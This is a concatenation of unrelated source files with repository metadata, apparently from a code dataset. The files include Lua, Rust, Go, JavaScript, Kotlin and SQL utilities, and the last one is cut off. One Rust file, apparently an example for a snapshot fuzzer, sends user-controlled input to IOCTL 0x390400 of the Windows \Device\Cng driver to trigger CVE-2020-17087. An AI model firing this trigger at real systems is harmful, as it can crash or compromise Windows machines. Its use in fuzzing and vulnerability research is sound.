-- and afterwards, log the content of the table
function create_key_value_table()
t = {
["fb34"] = 12, ["fb02"] = 24,
["fb11"] = 03, ["fb09"] = 19
}
for key,value in pairs(t) do
log(key .. " -> " .. value)
end
log("--------------------")
end
| 19.833333 | 69 | 0.495798 | 3.328125 |
d126662eb2bc5a54fec4f91fb3246ad34de7bcea | 3,459 | rs | Rust | examples/CVE-2020-17087/cng/src/main.rs | cokesme/rewind | ff93325626a15d83bd1a3e5de22daf5e07a26663 | [
"Apache-2.0"
] | 198 | 2021-07-13T20:47:20.000Z | 2022-03-25T05:39:55.000Z | examples/CVE-2020-17087/cng/src/main.rs | cokesme/rewind | ff93325626a15d83bd1a3e5de22daf5e07a26663 | [
"Apache-2.0"
] | 7 | 2021-07-19T13:28:40.000Z | 2021-11-22T10:15:31.000Z | examples/CVE-2020-17087/cng/src/main.rs | cokesme/rewind | ff93325626a15d83bd1a3e5de22daf5e07a26663 | [
"Apache-2.0"
] | 19 | 2021-07-18T14:57:56.000Z | 2022-03-29T03:40:53.000Z |
use std::io::{self, Read};
use std::ffi::CString;
use std::ptr::null_mut;
use winapi::um::fileapi::{CreateFileA, OPEN_EXISTING};
use winapi::um::winnt::{GENERIC_READ, GENERIC_WRITE, HANDLE};
use winapi::um::ioapiset::DeviceIoControl;
use winapi::um::handleapi::{CloseHandle, INVALID_HANDLE_VALUE};
// use winapi::um::errhandlingapi::GetLastError;
use clap::{Clap, crate_version};
use color_eyre::eyre::{Result, WrapErr};
#[derive(Clap, Debug)]
#[clap(version=crate_version!(), author="Damien Aumaitre")]
pub struct Cli {
#[clap(long="data", parse(from_os_str))]
pub data: Option<std::path::PathBuf>,
#[clap(long="size")]
pub size: Option<usize>,
}
fn main() -> Result<()> {
color_eyre::install()?;
let args = Cli::parse();
let device = CString::new("\\\\.\\GLOBALROOT\\Device\\Cng").wrap_err("Failed to create cstring")?;
let h_cng = validate_handle(unsafe {
CreateFileA(device.as_ptr(),
GENERIC_READ | GENERIC_WRITE,
0,
null_mut(),
OPEN_EXISTING,
0,
null_mut())
}).wrap_err("Failed to open handle to \\\\Device\\Cng")?;
println!("opened \\Device\\Cng, handle: {:?}", h_cng);
let ioctl = 0x390400;
let mut output = vec![0u8; 8];
let mut bytes = 0;
let mut input = match args.data {
Some(path) => {
let mut file = std::fs::File::open(path)?;
let mut input = Vec::new();
file.read_to_end(&mut input)?;
input
}
None => {
let size = args.size.unwrap_or(8);
vec![0u8; size]
}
};
match args.size {
Some(size) => {
input.resize(size, 0);
}
None => ()
}
println!("will send {:x} bytes to device", input.len());
let status = cvt(unsafe {
DeviceIoControl(h_cng,
ioctl,
input.as_mut_ptr() as *mut _,
input.len() as u32,
output.as_mut_ptr() as *mut _,
output.len() as u32,
&mut bytes,
null_mut())
});
println!("sent ioctl, result is {:x}", bytes);
println!("output: {:#x?}", &output);
match status {
Ok(_) => {
}
Err(err) => {
println!("got error: {:?}", err);
}
}
unsafe {
CloseHandle(h_cng);
}
Ok(())
}
fn cvt(i: i32) -> io::Result<i32> {
if i == 0 {
Err(io::Error::last_os_error())
} else {
Ok(i)
}
}
fn validate_handle(handle: HANDLE) -> io::Result<HANDLE> {
if handle == INVALID_HANDLE_VALUE {
Err(io::Error::new(io::ErrorKind::Other, "Handle is invalid"))
} else {
Ok(handle)
}
}
// int main() {
// HANDLE hCng = CreateFileA("\\\\.\\GLOBALROOT\\Device\\Cng",
// GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
// if (hCng == NULL) {
// printf("[-] Failed to open \\Device\\Cng: %u\n", GetLastError());
// return 1;
// }
// printf("[+] \\Device\\Cng opened, handle: %p\n", hCng);
// BOOL Status = DeviceIoControl(
// hCng,
// 0x390400,
// IoctlData,
// IoctlSize,
// &OutputBuffer,
// sizeof(OutputBuffer),
// &BytesReturned,
// NULL
// );
// printf("[+] Ioctl sent, Status: %d, OutputBuffer: %zx, BytesReturned: %lx\n", Status, OutputBuffer, BytesReturned);
// HeapFree(GetProcessHeap(), 0, IoctlData);
// CloseHandle(hCng);
| 23.530612 | 120 | 0.539751 | 3.03125 |
bd05ee50605573f5b44d7c3173638366e41c4c97 | 5,887 | rs | Rust | src/bin/day19.rs | pierd/advent-of-code-2018 | c2bef61e2809d5ce1e8ffa1246a9723e2b967861 | [
"MIT"
] | null | null | null | src/bin/day19.rs | pierd/advent-of-code-2018 | c2bef61e2809d5ce1e8ffa1246a9723e2b967861 | [
"MIT"
] | null | null | null | src/bin/day19.rs | pierd/advent-of-code-2018 | c2bef61e2809d5ce1e8ffa1246a9723e2b967861 | [
"MIT"
] | null | null | null | use std::str::FromStr;
#[derive(Clone, Copy, Debug, Eq, Hash, Ord, PartialEq, PartialOrd)]
enum Arg {
Register,
Immediate,
}
impl Arg {
fn from_char(c: char) -> Option<Self> {
match c {
'r' => Some(Self::Register),
'i' => Some(Self::Immediate),
_ => None,
}
}
fn get(&self, regs: &[usize; 6], num: usize) -> usize {
match self {
Arg::Register => regs[num],
Arg::Immediate => num,
}
}
}
#[derive(Clone, Copy, Debug, Eq, Hash, Ord, PartialEq, PartialOrd)]
enum Opcode {
Add(Arg),
Mul(Arg),
Set(Arg),
Gt(Arg, Arg),
Eq(Arg, Arg),
}
impl FromStr for Opcode {
type Err = ();
fn from_str(s: &str) -> Result<Self, Self::Err> {
let arg = |c| Arg::from_char(c).ok_or(());
let mut chars = s.chars();
let mut next_char = || chars.next();
match (next_char(), next_char(), next_char(), next_char()) {
(Some('a'), Some('d'), Some('d'), Some(c)) => Ok(Opcode::Add(arg(c)?)),
(Some('m'), Some('u'), Some('l'), Some(c)) => Ok(Opcode::Mul(arg(c)?)),
(Some('s'), Some('e'), Some('t'), Some(c)) => Ok(Opcode::Set(arg(c)?)),
(Some('g'), Some('t'), Some(c1), Some(c2)) => Ok(Opcode::Gt(arg(c1)?, arg(c2)?)),
(Some('e'), Some('q'), Some(c1), Some(c2)) => Ok(Opcode::Eq(arg(c1)?, arg(c2)?)),
_ => Err(()),
}
}
}
#[derive(Clone, Copy, Debug, Eq, Hash, Ord, PartialEq, PartialOrd)]
struct Instruction {
opcode: Opcode,
args: [usize; 3],
}
impl FromStr for Instruction {
type Err = ();
fn from_str(s: &str) -> Result<Self, Self::Err> {
let mut parts = s.split(' ');
let opcode: Opcode = parts.next().unwrap().parse()?;
let args = [
parts.next().unwrap().parse().map_err(|_| ())?,
parts.next().unwrap().parse().map_err(|_| ())?,
parts.next().unwrap().parse().map_err(|_| ())?,
];
Ok(Self { opcode, args })
}
}
impl Instruction {
fn execute(&self, regs: &mut [usize; 6]) {
regs[self.args[2]] = match self.opcode {
Opcode::Add(arg) => regs[self.args[0]] + arg.get(regs, self.args[1]),
Opcode::Mul(arg) => regs[self.args[0]] * arg.get(regs, self.args[1]),
Opcode::Set(arg) => arg.get(regs, self.args[0]),
Opcode::Gt(arg1, arg2) => {
if arg1.get(regs, self.args[0]) > arg2.get(regs, self.args[1]) {
1
} else {
0
}
}
Opcode::Eq(arg1, arg2) => {
if arg1.get(regs, self.args[0]) == arg2.get(regs, self.args[1]) {
1
} else {
0
}
}
}
}
}
fn parse(input: &str) -> (usize, Vec<Instruction>) {
let mut lines = input.lines();
let first_line = lines.next().unwrap();
(
first_line
.strip_prefix("#ip ")
.unwrap()
.parse::<usize>()
.unwrap(),
lines
.map(|line| line.parse::<Instruction>().unwrap())
.collect::<Vec<Instruction>>(),
)
}
fn execute_zeroed(ip_idx: usize, instructions: &[Instruction]) -> [usize; 6] {
execute(Default::default(), ip_idx, instructions)
}
fn execute(mut regs: [usize; 6], ip_idx: usize, instructions: &[Instruction]) -> [usize; 6] {
while let Some(instr) = instructions.get(regs[ip_idx]) {
instr.execute(&mut regs);
regs[ip_idx] += 1;
}
regs
}
fn hacked_calc(c: usize) -> usize {
let mut a = 0;
for b in 1..=c {
if c % b == 0 {
a += c / b;
}
}
a
}
fn main() {
let (ip_idx, mut instructions) = parse(include_str!("../../inputs/day19.txt"));
let regs = execute_zeroed(ip_idx, &instructions);
println!("Part 1: {}", regs[0]);
// exit after initial processing and used handcrafted implementation instead
instructions[1] = Instruction {
opcode: Opcode::Set(Arg::Immediate),
args: [100, 100, ip_idx],
};
let regs = execute([1, 0, 0, 0, 0, 0], ip_idx, &instructions);
println!("Part 2: {}", hacked_calc(regs[2]));
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_parse_sample() {
assert_eq!(
parse(include_str!("../../inputs/day19-example.txt")),
(
0,
vec![
Instruction {
opcode: Opcode::Set(Arg::Immediate),
args: [5, 0, 1]
},
Instruction {
opcode: Opcode::Set(Arg::Immediate),
args: [6, 0, 2]
},
Instruction {
opcode: Opcode::Add(Arg::Immediate),
args: [0, 1, 0]
},
Instruction {
opcode: Opcode::Add(Arg::Register),
args: [1, 2, 3]
},
Instruction {
opcode: Opcode::Set(Arg::Register),
args: [1, 0, 0]
},
Instruction {
opcode: Opcode::Set(Arg::Immediate),
args: [8, 0, 4]
},
Instruction {
opcode: Opcode::Set(Arg::Immediate),
args: [9, 0, 5]
},
]
)
)
}
#[test]
fn test_execute_sample() {
let (ip_idx, instructions) = parse(include_str!("../../inputs/day19-example.txt"));
let regs = execute_zeroed(ip_idx, &instructions);
assert_eq!(regs[0], 7);
}
}
| 29.732323 | 93 | 0.449465 | 3.25 |
cba8aa1f2023ccab6db26eed04efb0a4f1770e61 | 2,794 | go | Go | core/handler/device/store.go | Wcctnoam/dockerttn | 20ac410081e533cbbfe606b983cd303bfaed2bee | [
"MIT"
] | 1 | 2017-09-15T23:28:48.000Z | 2017-09-15T23:28:48.000Z | core/handler/device/store.go | SH-Paek/ttn | 3ec0bdc33316e6d383f699c884b1149326a608e7 | [
"MIT"
] | null | null | null | core/handler/device/store.go | SH-Paek/ttn | 3ec0bdc33316e6d383f699c884b1149326a608e7 | [
"MIT"
] | null | null | null | // Copyright © 2017 The Things Network
// Use of this source code is governed by the MIT license that can be found in the LICENSE file.
package device
import (
"fmt"
"time"
"github.com/TheThingsNetwork/ttn/core/storage"
"github.com/TheThingsNetwork/ttn/utils/errors"
"gopkg.in/redis.v5"
)
// Store interface for Devices
type Store interface {
List() ([]*Device, error)
ListForApp(appID string) ([]*Device, error)
Get(appID, devID string) (*Device, error)
Set(new *Device, properties ...string) (err error)
Delete(appID, devID string) error
}
const defaultRedisPrefix = "handler"
const redisDevicePrefix = "device"
// NewRedisDeviceStore creates a new Redis-based Device store
func NewRedisDeviceStore(client *redis.Client, prefix string) *RedisDeviceStore {
if prefix == "" {
prefix = defaultRedisPrefix
}
store := storage.NewRedisMapStore(client, prefix+":"+redisDevicePrefix)
store.SetBase(Device{}, "")
return &RedisDeviceStore{
store: store,
}
}
// RedisDeviceStore stores Devices in Redis.
// - Devices are stored as a Hash
type RedisDeviceStore struct {
store *storage.RedisMapStore
}
// List all Devices
func (s *RedisDeviceStore) List() ([]*Device, error) {
devicesI, err := s.store.List("", nil)
if err != nil {
return nil, err
}
devices := make([]*Device, 0, len(devicesI))
for _, deviceI := range devicesI {
if device, ok := deviceI.(Device); ok {
devices = append(devices, &device)
}
}
return devices, nil
}
// ListForApp lists all devices for a specific Application
func (s *RedisDeviceStore) ListForApp(appID string) ([]*Device, error) {
devicesI, err := s.store.List(fmt.Sprintf("%s:*", appID), nil)
if err != nil {
return nil, err
}
devices := make([]*Device, 0, len(devicesI))
for _, deviceI := range devicesI {
if device, ok := deviceI.(Device); ok {
devices = append(devices, &device)
}
}
return devices, nil
}
// Get a specific Device
func (s *RedisDeviceStore) Get(appID, devID string) (*Device, error) {
deviceI, err := s.store.Get(fmt.Sprintf("%s:%s", appID, devID))
if err != nil {
return nil, err
}
if device, ok := deviceI.(Device); ok {
return &device, nil
}
return nil, errors.New("Database did not return a Device")
}
// Set a new Device or update an existing one
func (s *RedisDeviceStore) Set(new *Device, properties ...string) (err error) {
now := time.Now()
new.UpdatedAt = now
key := fmt.Sprintf("%s:%s", new.AppID, new.DevID)
if new.old != nil {
err = s.store.Update(key, *new, properties...)
} else {
new.CreatedAt = now
err = s.store.Create(key, *new, properties...)
}
if err != nil {
return
}
return nil
}
// Delete a Device
func (s *RedisDeviceStore) Delete(appID, devID string) error {
key := fmt.Sprintf("%s:%s", appID, devID)
return s.store.Delete(key)
}
| 24.946429 | 96 | 0.682892 | 3.03125 |
f08d5fe0a3761d545d2f4c637b8ea051f71bf530 | 1,506 | js | JavaScript | lib/custom-commands/waitForClientConnected.js | atobatele/Nightwatch | b3e18debd6ed50d0a5410bec528508b5093a6662 | [
"MIT"
] | 12 | 2015-01-12T14:29:52.000Z | 2020-12-25T16:12:00.000Z | lib/custom-commands/waitForClientConnected.js | atobatele/Nightwatch | b3e18debd6ed50d0a5410bec528508b5093a6662 | [
"MIT"
] | 3 | 2015-01-27T00:20:43.000Z | 2018-07-31T02:10:45.000Z | lib/custom-commands/waitForClientConnected.js | atobatele/Nightwatch | b3e18debd6ed50d0a5410bec528508b5093a6662 | [
"MIT"
] | 11 | 2015-01-27T00:20:52.000Z | 2021-01-26T13:39:31.000Z | var util = require('util');
var events = require('events');
function WaitFor() {
events.EventEmitter.call(this);
this.startTime = null;
}
util.inherits(WaitFor, events.EventEmitter);
WaitFor.prototype.command = function (element, ms, msg) {
this.startTime = new Date().getTime();
var self = this;
var message;
if (typeof ms !== 'number') {
ms = 500;
}
this.check(element, function (result, elapsedMs) {
if (result) {
var successMsg = msg || 'Video stream "%s" was connected in %s ms.';
message = util.format(successMsg, element, elapsedMs - self.startTime);
} else {
message = util.format('Video stream "%s" was not connected in %s ms.', element, ms);
}
self.client.assertion(result, null, null, message, true);
self.emit('complete');
}, ms);
return this;
};
WaitFor.prototype.check = function (element, cb, maxTime) {
var self = this;
var executeArgs = [element];
var executeCallback = function (result) {
var now = new Date().getTime();
if (result.value) {
cb(true, now);
} else if (now - self.startTime < maxTime) {
setTimeout(function () {
self.check(element, cb, maxTime);
}, 1000);
} else {
cb(false);
}
};
this.api.execute(function(selector) {
try {
return document.querySelector(selector) && (document.querySelector(selector).readyState == 4);
} catch (err) {
return false;
}
}, executeArgs, executeCallback);
};
module.exports = WaitFor; | 25.1 | 100 | 0.62417 | 3.265625 |
b53a90f7211eb97269aee7a39d15e41a5c2cc47c | 964 | rs | Rust | src/selection_sorts/heapsort.rs | twirrim/rust-sort | 056226632b1a713212b90eeb8a251fa412b4b360 | [
"MIT"
] | null | null | null | src/selection_sorts/heapsort.rs | twirrim/rust-sort | 056226632b1a713212b90eeb8a251fa412b4b360 | [
"MIT"
] | null | null | null | src/selection_sorts/heapsort.rs | twirrim/rust-sort | 056226632b1a713212b90eeb8a251fa412b4b360 | [
"MIT"
] | null | null | null | #[cfg(test)]
mod tests {
use crate::heapsort;
#[test]
fn sort() {
let mut data = vec![5, 4, 3, 2, 1];
heapsort(&mut data);
assert_eq!(data, [1, 2, 3, 4, 5]);
}
}
fn _heapify<T: PartialOrd>(v: &mut [T], mut i: usize) {
let l = v.len();
loop {
let mut parent_idx = i;
let left_child_idx = 2 * i + 1;
let right_child_idx = 2 * i + 2;
if left_child_idx < l && v[left_child_idx] < v[parent_idx] {
parent_idx = left_child_idx;
}
if right_child_idx < l && v[right_child_idx] < v[parent_idx] {
parent_idx = right_child_idx;
}
if i == parent_idx {
break;
}
v.swap(i, parent_idx);
i = parent_idx;
}
}
pub fn heapsort<T: PartialOrd>(v: &mut [T]) {
let l = v.len();
for i in (0..(l / 2)).rev() {
_heapify(v, i);
}
for i in 0..l {
_heapify(&mut v[i..], 0);
}
}
| 22.418605 | 70 | 0.477178 | 3.28125 |
18b033c2844b16920f7a0e6cd308a8172fe20c37 | 1,425 | kt | Kotlin | remote/src/test/kotlin/com/androchef/remote/mappers/movies/MovieModelEntityMapperTest.kt | Abdul-Quadri-Ismail/Android-Clean-Architecture | 068912c99ad2cb890be37049f0f208457dbab63c | [
"MIT"
] | 227 | 2020-04-26T09:12:44.000Z | 2022-03-28T03:27:43.000Z | remote/src/test/kotlin/com/androchef/remote/mappers/movies/MovieModelEntityMapperTest.kt | Abdul-Quadri-Ismail/Android-Clean-Architecture | 068912c99ad2cb890be37049f0f208457dbab63c | [
"MIT"
] | 1 | 2021-01-09T13:39:38.000Z | 2021-01-09T19:36:09.000Z | remote/src/test/kotlin/com/androchef/remote/mappers/movies/MovieModelEntityMapperTest.kt | Abdul-Quadri-Ismail/Android-Clean-Architecture | 068912c99ad2cb890be37049f0f208457dbab63c | [
"MIT"
] | 49 | 2020-04-27T07:33:58.000Z | 2021-12-09T05:08:47.000Z | package com.androchef.remote.mappers.movies
import com.androchef.data.models.MovieEntity
import com.androchef.remote.factory.movies.RemoteMovieFactory
import com.androchef.remote.models.movies.MovieModel
import org.junit.Assert.assertEquals
import org.junit.Before
import org.junit.Test
import org.junit.runner.RunWith
import org.mockito.runners.MockitoJUnitRunner
@RunWith(MockitoJUnitRunner::class)
class MovieModelEntityMapperTest {
private lateinit var movieModelEntityMapper: MovieModelEntityMapper
@Before
fun setUp() {
movieModelEntityMapper = MovieModelEntityMapper()
}
@Test
fun mapFromModel() {
// Arrange
val movieModel = RemoteMovieFactory.generateMovieModel()
// Act
val movieEntity = movieModelEntityMapper.mapFromModel(movieModel)
// Assert
assertMapMovieDataEquals(movieModel, movieEntity)
}
/**
* Helper Methods
*/
private fun assertMapMovieDataEquals(movieModel: MovieModel, movieEntity: MovieEntity) {
assertEquals(movieEntity.isBookMarked, false)
assertEquals(movieEntity.profilePath, movieModel.profilePath)
assertEquals(movieEntity.voteAverage, movieModel.voteAverage)
assertEquals(movieEntity.movieTitle, movieModel.title)
assertEquals(movieEntity.movieName, movieModel.name)
assertEquals(movieEntity.posterPath, movieModel.posterPath)
}
}
| 30.978261 | 92 | 0.750877 | 3 |
491f40bbe37c426879fd118c068500e34a39dd5f | 3,862 | lua | Lua | resources/[race]/race_progress/Settings.lua | AfuSensi/MTA-Resources | e4a0f3981ddc92c8f15c3d93140196c6a8589fa8 | [
"MIT",
"0BSD"
] | 18 | 2018-09-13T14:50:40.000Z | 2022-02-02T21:44:50.000Z | resources/[race]/race_progress/Settings.lua | AfuSensi/MTA-Resources | e4a0f3981ddc92c8f15c3d93140196c6a8589fa8 | [
"MIT",
"0BSD"
] | 151 | 2018-03-08T11:01:42.000Z | 2021-10-05T17:25:05.000Z | resources/[race]/race_progress/Settings.lua | AfuSensi/MTA-Resources | e4a0f3981ddc92c8f15c3d93140196c6a8589fa8 | [
"MIT",
"0BSD"
] | 111 | 2018-03-08T10:53:00.000Z | 2022-03-12T18:54:54.000Z | ---
-- Class to manage settings, which can be used in other scripts.
--
-- @author driver2
-- @copyright 2009 driver2
--
-- Changes:
-- 2010-01-30: Commented functions and cleaned up a bit
Settings = {}
---
-- Creates a new object with the default settings and
-- the filename.
--
-- @param table defaultSettings: A table with the default settings
-- @param string filename: The xml file to save the settings to
function Settings:new(defaultSettings,filename)
local object = {}
setmetatable(object,self)
self.__index = self
object.settingsXml = Xml:new(filename,"settings")
object.settings = {}
object.settings.default = defaultSettings
return object
end
---
-- Change a setting to a new value.
--
-- @param string settings: The name of the setting
-- @param mixed value: The value of the setting (should be something that can be saved
-- as a string
-- @param string settingType (optional, defaults to "main"): The type of the setting
function Settings:set(setting,value,settingType)
-- Set default type if parameter was omitted
if settingType == nil then
settingType = "main"
end
-- Retrieve the datatype of the setting by the default setting
local defaultType = type(self.settings.default[setting])
-- Convert according to datatype
if defaultType == "string" then
value = tostring(value)
elseif defaultType == "number" then
value = tonumber(value)
elseif defaultType == "boolean" then
value = toboolean(value)
end
-- If table for this settingtype doesnt exist, create it
if self.settings[settingType] == nil then
self.settings[settingType] = {}
end
-- Set new value to setting
self.settings[settingType][setting] = value
end
---
-- Load settings of this setting type from the XML file
--
-- @param string settingType (optional, defaults to "main"): The setting type
function Settings:loadFromXml(settingType)
-- Set default type if parameter was omitted
if settingType == nil then
settingType = "main"
end
self.settingsXml:open()
-- Loop through default settings and read the values
for k,v in pairs(self.settings.default) do
local value = self.settingsXml:getAttribute("root",k)
if value ~= false and value ~= "" then
self:set(k,value,settingType)
else
self:set(k,v,settingType)
end
end
self.settingsXml:unload()
end
---
-- Save the settings of this setting type to the XML file
--
-- @param string setting (optional, defaults to nil): The name of the setting
-- to save (if omitted, it will save all settings)
-- @param string settingType (optional, defaults to "main"): The setting type
function Settings:saveToXml(setting,settingType)
if settingType == nil then
settingType = "main"
end
self.settingsXml:open()
-- Loop through all settings of this type and save them if
-- they are equal to the setting or if setting is nil.
for k,v in pairs(self.settings[settingType]) do
if setting == nil or setting == k then
self.settingsXml:setAttribute("root",k,v)
end
end
self.settingsXml:save()
self.settingsXml:unload()
end
---
-- Gets a single setting.
--
-- @param string setting: The name of the setting
-- @param string settingType (optional): The type of the setting (default: "main")
function Settings:get(setting,settingType)
-- Retrieve datatype from default settings
datatype = type(self.settings.default[setting])
-- Set default settingtype if parameter was omitted
if settingType == nil then
settingType = "main"
end
local value = nil
-- Get the setting from this setting type if it exists
if (self.settings[settingType] ~= nil) then
value = self.settings[settingType][setting]
end
-- If the datatype of the retrieved value matches the default datatype, everything is ok
if type(value) == datatype then
return value
end
-- If not, return the default value
return self.settings.default[setting]
end
| 29.480916 | 91 | 0.723977 | 3.34375 |
8d70932119fe049ad9138d4db885ecb9c268977c | 1,676 | lua | Lua | debugtool.lua | wcguo/xiuxian | 953cf54b3eea558ee7dee4ec6f161b9a66c137ac | [
"MIT"
] | 1 | 2022-02-23T18:00:08.000Z | 2022-02-23T18:00:08.000Z | debugtool.lua | wcguo/xiuxian | 953cf54b3eea558ee7dee4ec6f161b9a66c137ac | [
"MIT"
] | null | null | null | debugtool.lua | wcguo/xiuxian | 953cf54b3eea558ee7dee4ec6f161b9a66c137ac | [
"MIT"
] | 1 | 2022-03-08T17:23:06.000Z | 2022-03-08T17:23:06.000Z | local debug_util = {}
debug_util.debug_mode = true
debug_log = debug_util.debug_mode and log or function()
end
---- 序列化
--print( serpent.dump( aTable ) ) -- 完整序列化
--print( serpent.line( aTable ) ) -- 转换为 1 行 , 没有自引用
--print( serpent.block( aTable ) ) -- 转换为多行 , 没有自引用
function debug_util.info(obj)
if not debug_util.debug_mode then
return
end
debug_log("------------xiuxian info------------------")
debug_log(serpent.block(obj))
debug_log("------------xiuxian info end--------------")
end
function debug_util.tojson(obj, level)
level = level or 1
local levelSpace = ""
for i = 1, level, 1 do
levelSpace = levelSpace .. " "
end
local size = 1
local maxSize = table_size(obj)
local s = level == 1 and "\n{" or "{"
for k, v in pairs(obj) do
s = s .. "\n" .. levelSpace .. (type(k) == "number" and "" or (tostring(k) .. " : "))
local dataType = type(v)
if dataType == "table" then
s = s ..dataType --debug_util.tojson(v, level + 1)
elseif dataType == "string" then
s = s .. "\"" .. v .. "\""
else
s = s .. tostring(v)
end
if size < maxSize then
s = s .. " ,"
end
size = size + 1
end
s = s .. "\n"
for i = 1, level - 1, 1 do
s = s .. " "
end
return s .. "}"
end
function debug_util.infoless(obj, level)
if not debug_util.debug_mode then
return
end
debug_log("------------xiuxian info------------------")
debug_log(debug_util.tojson(obj, level))
debug_log("------------xiuxian info end--------------")
end
return debug_util
| 23.942857 | 93 | 0.517303 | 3.1875 |
f7e9a9b08517c3b14fb2705c904f3abed9341ce4 | 931 | sql | SQL | backend/de.metas.adempiere.adempiere/migration/src/main/sql/postgresql/ddl/public/functions/getCostPrice.sql | dram/metasfresh | a1b881a5b7df8b108d4c4ac03082b72c323873eb | [
"RSA-MD"
] | 1,144 | 2016-02-14T10:29:35.000Z | 2022-03-30T09:50:41.000Z | backend/de.metas.adempiere.adempiere/migration/src/main/sql/postgresql/ddl/public/functions/getCostPrice.sql | vestigegroup/metasfresh | 4b2d48c091fb2a73e6f186260a06c715f5e2fe96 | [
"RSA-MD"
] | 8,283 | 2016-04-28T17:41:34.000Z | 2022-03-30T13:30:12.000Z | backend/de.metas.adempiere.adempiere/migration/src/main/sql/postgresql/ddl/public/functions/getCostPrice.sql | vestigegroup/metasfresh | 4b2d48c091fb2a73e6f186260a06c715f5e2fe96 | [
"RSA-MD"
] | 441 | 2016-04-29T08:06:07.000Z | 2022-03-28T06:09:56.000Z | -- DROP FUNCTION getCostPrice(numeric, numeric, numeric);
CREATE OR REPLACE FUNCTION getCostPrice
(
p_M_Product_ID numeric,
p_AD_Client_ID numeric,
p_AD_Org_ID numeric
)
RETURNS numeric
AS
$BODY$
SELECT COALESCE(sum(cost.CurrentCostPrice), 0)
FROM M_Cost cost
INNER JOIN C_AcctSchema acs on acs.C_AcctSchema_ID=cost.C_AcctSchema_ID
INNER JOIN M_CostElement ce on cost.M_CostElement_ID = ce.M_CostElement_ID
WHERE cost.M_Product_ID = p_M_Product_ID
AND cost.AD_Client_ID = p_AD_Client_ID
AND cost.AD_Org_ID = p_AD_Org_ID
AND cost.C_AcctSchema_ID = (select ci.C_AcctSchema1_ID from AD_ClientInfo ci where ci.AD_Client_ID = p_AD_Client_ID)
AND ce.CostingMethod = acs.CostingMethod
--
UNION ALL
(
SELECT 0
)
LIMIT 1
$BODY$
LANGUAGE sql STABLE
;
COMMENT ON FUNCTION getCostPrice(numeric, numeric, numeric) IS
' -- TEST :
SELECT M_Product_ID, getCostPrice(M_Product_ID, 1000000, 1000000) from M_Product; '
; | 25.861111 | 117 | 0.787325 | 3.0625 |
652cc5a124cb82089fec9b806d9345c58673911c | 7,292 | rs | Rust | src/clash/progression/gambler.rs | chamons/ArenaGS | 0d3c8d4ebc818198b21a8c99dc853286cc16b7c2 | [
"MIT"
] | null | null | null | src/clash/progression/gambler.rs | chamons/ArenaGS | 0d3c8d4ebc818198b21a8c99dc853286cc16b7c2 | [
"MIT"
] | 126 | 2017-05-14T19:41:31.000Z | 2020-11-24T15:53:49.000Z | src/clash/progression/gambler.rs | chamons/ArenaGS | 0d3c8d4ebc818198b21a8c99dc853286cc16b7c2 | [
"MIT"
] | null | null | null | use std::cmp;
use std::collections::HashMap;
use rand::prelude::*;
use specs::prelude::*;
use super::super::*;
pub fn get_reward_request(ecs: &World, count: u32) -> Vec<(EquipmentRarity, u32)> {
let mut rng = ecs.write_resource::<RandomComponent>();
let choices = vec![EquipmentRarity::Common, EquipmentRarity::Uncommon, EquipmentRarity::Rare];
let mut requests = HashMap::new();
let mut add_request = |kind: EquipmentRarity| *requests.entry(kind).or_insert(0) += 1;
for _ in 0..count {
add_request(
*choices
.choose_weighted(&mut rng.rand, |i| match i {
EquipmentRarity::Common => 75,
EquipmentRarity::Uncommon => 15,
EquipmentRarity::Rare => 10,
EquipmentRarity::Standard => 0,
})
.unwrap(),
);
}
requests.iter().map(|x| (*x.0, *x.1)).collect()
}
pub fn get_merchant_items(ecs: &World) -> Vec<EquipmentItem> {
get_random_items(
ecs,
vec![(EquipmentRarity::Rare, 1), (EquipmentRarity::Uncommon, 2), (EquipmentRarity::Common, 5)],
)
}
pub fn get_random_items(ecs: &World, requests: Vec<(EquipmentRarity, u32)>) -> Vec<EquipmentItem> {
let equipment = ecs.read_resource::<EquipmentResource>();
let progression = ecs.read_resource::<ProgressionComponent>();
let available: Vec<&EquipmentItem> = equipment.all().filter(|e| !progression.state.items.contains(&e.name)).collect();
let rare: Vec<&EquipmentItem> = available.iter().filter(|e| e.rarity == EquipmentRarity::Rare).copied().collect();
let uncommon: Vec<&EquipmentItem> = available.iter().filter(|e| e.rarity == EquipmentRarity::Uncommon).copied().collect();
let common: Vec<&EquipmentItem> = available.iter().filter(|&e| e.rarity == EquipmentRarity::Common).copied().collect();
let rare_request_count: u32 = requests.iter().filter(|r| r.0 == EquipmentRarity::Rare).map(|r| r.1).sum();
let mut uncommon_request_count: u32 = requests.iter().filter(|r| r.0 == EquipmentRarity::Uncommon).map(|r| r.1).sum();
let mut common_request_count: u32 = requests.iter().filter(|r| r.0 == EquipmentRarity::Common).map(|r| r.1).sum();
let rare_count = cmp::min(rare_request_count, rare.len() as u32);
if rare_count < rare_request_count {
uncommon_request_count += rare_request_count - rare_count;
}
let uncommon_count = cmp::min(uncommon_request_count, uncommon.len() as u32);
if uncommon_count < uncommon_request_count {
common_request_count += uncommon_request_count - uncommon_count;
}
let common_count = cmp::min(common_request_count, common.len() as u32);
let mut rng = ecs.write_resource::<RandomComponent>();
let mut chosen = Vec::with_capacity((rare_request_count + uncommon_request_count + common_request_count) as usize);
chosen.extend(rare.choose_multiple(&mut rng.rand, rare_count as usize).map(|&e| e.clone()));
chosen.extend(uncommon.choose_multiple(&mut rng.rand, uncommon_count as usize).map(|&e| e.clone()));
chosen.extend(common.choose_multiple(&mut rng.rand, common_count as usize).map(|&e| e.clone()));
// Reverse so rare at end
chosen.reverse();
chosen
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn selects_items() {
let mut ecs = World::new();
let equipments = EquipmentResource::init_with(&[
EquipmentItem::init("a", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("b", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("c", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("d", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
]);
let progression = ProgressionComponent::init(ProgressionState::init(0, 0, &["a"], CharacterWeaponKind::Gunslinger, Equipment::init_empty()));
ecs.insert(RandomComponent::init());
ecs.insert(progression);
ecs.insert(equipments);
for _ in 0..10 {
let chosen = get_random_items(&ecs, vec![(EquipmentRarity::Common, 2)]);
assert_eq!(2, chosen.len());
assert!(chosen.iter().all(|c| c.name == "b" || c.name == "c" || c.name == "d"));
}
}
#[test]
